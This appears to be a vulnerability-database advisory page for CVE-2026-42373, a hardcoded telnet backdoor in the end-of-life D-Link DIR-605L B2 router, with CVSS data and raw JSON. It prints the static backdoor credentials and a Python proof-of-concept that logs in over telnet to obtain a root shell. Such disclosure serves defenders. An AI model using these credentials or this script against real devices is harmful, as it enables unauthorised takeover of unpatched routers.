Security Vulnerability Report
中文
CVE-2026-42373 CVSS 9.8 CRITICAL

CVE-2026-42373

Published: 2026-05-04 17:16:26
Last Modified: 2026-05-06 12:19:21
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

D-Link DIR-605L Hardware Revision B2 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn76_dlwbr_dir605L" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-605l_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-605l:b2:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-605L Hardware Revision B2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import telnetlib import sys # Target IP address of the vulnerable device HOST = '192.168.0.1' PORT = 23 # Hardcoded credentials extracted from firmware USER = 'Alphanetworks' PASS = 'wrgn76_dlwbr_dir605L' def exploit(): try: # Establish Telnet connection tn = telnetlib.Telnet(HOST, PORT, timeout=10) # Wait for login prompt tn.read_until(b"login: ", timeout=5) tn.write(USER.encode('ascii') + b"\n") # Wait for password prompt tn.read_until(b"Password: ", timeout=5) tn.write(PASS.encode('ascii') + b"\n") # If successful, we have a root shell print("[+] Exploit successful! Root shell access granted.") print(tn.read_all().decode('ascii')) tn.close() except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42373", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-04T17:16:25.527", "lastModified": "2026-05-06T12:19:20.757", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "D-Link DIR-605L Hardware Revision B2 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username \"Alphanetworks\" and the static password \"wrgn76_dlwbr_dir605L\" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-605l_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "38A73373-86B3-4DDC-A880-A66D29C7176F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-605l:b2:*:*:*:*:*:*:*", "matchCriteriaId": "D096BA86-3FCB-4F16-89CA-3A2A152C88B9"}]}]}], "references": [{"url": "https://www.securin.io/zero-day/cve-2026-42373-hardcoded-telnet-backdoor-in-d-link-dir-605l-b2-end-of-life-", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.securin.io/zero-day/cve-2026-42373-hardcoded-telnet-backdoor-in-d-link-dir-605l-b2-end-of-life-", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}